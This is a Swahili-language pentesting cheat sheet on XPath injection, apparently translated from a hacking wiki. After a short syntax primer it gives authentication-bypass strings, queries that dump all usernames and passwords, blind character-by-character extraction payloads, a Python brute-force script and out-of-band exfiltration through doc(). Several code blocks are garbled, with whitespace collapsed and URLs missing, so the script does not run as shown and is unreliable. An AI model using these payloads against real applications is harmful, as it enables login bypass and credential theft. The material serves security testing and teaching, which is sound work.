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Basic Syntax
Mbinu ya shambulio inayojulikana kama XPath Injection inatumika kuchukua faida ya programu ambazo zinaunda XPath (XML Path Language) maswali kulingana na pembejeo za mtumiaji ili kuuliza au kuvinjari hati za XML.
Nodes Described
Mifano inatumika kuchagua nodi mbalimbali katika hati ya XML. Mifano hii na maelezo yao imejumuishwa hapa chini:
nodename: Nodi zote zenye jina "nodename" zinachaguliwa.
/: Uchaguzi unafanywa kutoka kwa nodi ya mzizi.
//: Nodi zinazolingana na uchaguzi kutoka kwa nodi ya sasa zinachaguliwa, bila kujali mahali zilipo katika hati.
.: Nodi ya sasa inachaguliwa.
..: Nodi mzazi ya nodi ya sasa inachaguliwa.
@: Sifa zinachaguliwa.
XPath Examples
Mifano ya mifano ya njia na matokeo yao ni pamoja na:
bookstore: Nodi zote zenye jina "bookstore" zinachaguliwa.
/bookstore: Kigezo cha mzizi bookstore kinachaguliwa. Inabainishwa kuwa njia kamili kwa kipengele inawakilishwa na njia inayooanza na slash (/).
bookstore/book: Vipengele vyote vya kitabu ambavyo ni watoto wa bookstore vinachaguliwa.
//book: Vipengele vyote vya kitabu katika hati vinachaguliwa, bila kujali mahali vilipo.
bookstore//book: Vipengele vyote vya kitabu ambavyo ni wazazi wa kipengele bookstore vinachaguliwa, bila kujali nafasi yao chini ya kipengele bookstore.
//@lang: Sifa zote zenye jina lang zinachaguliwa.
Utilization of Predicates
Predicates zinatumika kuboresha uchaguzi:
/bookstore/book[1]: Kipengele cha kwanza cha kitabu mtoto wa kipengele bookstore kinachaguliwa. Njia mbadala kwa toleo za IE 5 hadi 9, ambazo zinaorodhesha nodi ya kwanza kama [0], ni kuweka SelectionLanguage kuwa XPath kupitia JavaScript.
/bookstore/book[last()]: Kipengele cha mwisho cha kitabu mtoto wa kipengele bookstore kinachaguliwa.
/bookstore/book[last()-1]: Kipengele cha pili cha mwisho cha kitabu mtoto wa kipengele bookstore kinachaguliwa.
/bookstore/book[position()<3]: Vipengele viwili vya kwanza vya kitabu watoto wa kipengele bookstore vinachaguliwa.
//title[@lang]: Vipengele vyote vya kichwa vyenye sifa ya lang vinachaguliwa.
//title[@lang='en']: Vipengele vyote vya kichwa vyenye thamani ya sifa ya "lang" ya "en" vinachaguliwa.
/bookstore/book[price>35.00]: Vipengele vyote vya kitabu vya bookstore vyenye bei zaidi ya 35.00 vinachaguliwa.
/bookstore/book[price>35.00]/title: Vipengele vyote vya kichwa vya vipengele vya kitabu vya bookstore vyenye bei zaidi ya 35.00 vinachaguliwa.
Handling of Unknown Nodes
Wildcards zinatumika kwa ajili ya kulinganisha nodi zisizojulikana:
*: Inalingana na nodi yoyote ya kipengele.
@*: Inalingana na nodi yoyote ya sifa.
node(): Inalingana na nodi yoyote ya aina yoyote.
Mifano zaidi ni pamoja na:
/bookstore/*: Inachagua nodi zote za watoto za kipengele bookstore.
//*: Inachagua vipengele vyote katika hati.
//title[@*]: Inachagua vipengele vyote vya kichwa vyenye angalau sifa moja ya aina yoyote.
All names - [pepe, mark, fino]
All values - [pepe, peponcio, admin, mark, ...]
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
Tambua & kuiba muundo
andcount(/*)=1#rootandcount(/*[1]/*)=2#count(root) = 2 (a,c)andcount(/*[1]/*[1]/*)=1#count(a) = 1 (b)andcount(/*[1]/*[1]/*[1]/*)=0#count(b) = 0andcount(/*[1]/*[2]/*)=3#count(c) = 3 (d,e,f)andcount(/*[1]/*[2]/*[1]/*)=0#count(d) = 0andcount(/*[1]/*[2]/*[2]/*)=0#count(e) = 0andcount(/*[1]/*[2]/*[3]/*)=1#count(f) = 1 (g)andcount(/*[1]/*[2]/*[3]/[1]*)=0#count(g) = 0#The previous solutions are the representation of a schema like the following#(at this stage we don't know the name of the tags, but jus the schema)<root><a><b></b></a><c><d></d><e></e><f><h></h></f></c></root>andname(/*[1])="root"#Confirm the name of the first tag is "root"andsubstring(name(/*[1]/*[1]),1,1)="a"#First char of name of tag `<a>` is "a"and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1))=105#Firts char of tag `<b>`is codepoint 105 ("i") ( the schema via OOBdoc(concat("", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))doc-available(concat("", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
Authentication Bypass
Mfano wa maswali:
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
OR bypass katika mtumiaji na nenosiri (thamani sawa katika zote mbili)
' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
Select account
Select the account using the username and use one of the previous values in the password field
Kutitisha sindano ya null
Username: ' or 1]%00
Double OR katika Jina la Mtumiaji au katika nenosiri (ni halali na uwanja mmoja tu dhaifu)
MUHIMU: Tambua kwamba "na" ndiyo operesheni ya kwanza inayofanywa.
Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2º account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
String extraction
Matokeo yana nyuzi na mtumiaji anaweza kubadilisha thamani kutafuta:
/user/username[contains(., '+VALUE+')]
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users
Blind Explotation
Pata urefu wa thamani na uitoe kwa kulinganisha:
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''='#True if length equals 4' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='#True is first equals "a"substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)...and ( if ( $employee/role=2 ) thenerror()else0 )... #When error() is executed it rises an error and never returns a value
Mfano wa Python
import requests, stringflag =""l =0alphabet = string.ascii_letters + string.digits +"{}_()"for i inrange(30):r = requests.get(" and string-length(password)="+str(i))if ("TRUE_COND"in r.text):l = ibreakprint("[+] Password length: "+str(l))for i inrange(1, l +1):#print("[i] Looking for char number " + str(i))for al in alphabet:r = requests.get(" and substring(password,"+str(i)+",1)="+al)if ("TRUE_COND"in r.text):flag += alprint("[+] Flag: "+ flag)break
doc(concat("", RESULTS))doc(concat("", /Employees/Employee[1]/username))doc(concat("", encode-for-uri(/Employees/Employee[1]/username)))#Instead of doc() you can use the function doc-availabledoc-available(concat("", RESULTS))#the doc available will respond true or false depending if the doc exists,#user not(doc-available(...)) to invert the result if you need to